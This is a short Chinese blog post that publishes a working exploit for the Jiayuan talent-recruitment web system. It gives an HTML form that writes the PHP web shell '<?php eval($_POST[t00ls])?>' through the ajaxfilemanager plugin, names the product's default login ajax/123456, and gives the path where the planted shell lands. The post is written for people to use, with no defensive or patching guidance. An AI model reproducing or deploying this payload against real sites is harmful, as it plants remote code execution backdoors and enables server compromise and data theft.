当前位置: iick's blog > 网站漏洞 > 嘉缘人才系统漏洞

嘉缘人才系统漏洞

作者:hack1990 时间:11-11-18 阅读数:683人阅读

为什么会出现漏洞...看这里

http://www.exploit-db.com/exploits/18075/


exp:

jiayun.html:

<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"><input type="text" value="http://127.0.0.1/freditor/plugins/ajaxfilemanager/ajax_create_folder.php" name="doaction" style="width:400"><br /><input type="text" value="<?php eval($_POST[t00ls])?>" name="foo" style="width:400"><br /><input type="submit" value="提交" name="QuickSearchBtn"><br /></form><script>function addaction(){ document.QuickSearch.action=document.QuickSearch.doaction.value;}</script>
 


利用 
默认账号ajax
密码123456
之后exp。。
地址/freditor/plugins/ajaxfilemanager/inc/data.php

 

# Nmap Security Scanner 7.0

上一篇:某企业网站整站漏洞

下一篇:第一视频 & NCeditor 上传漏洞

相关文章

发表评论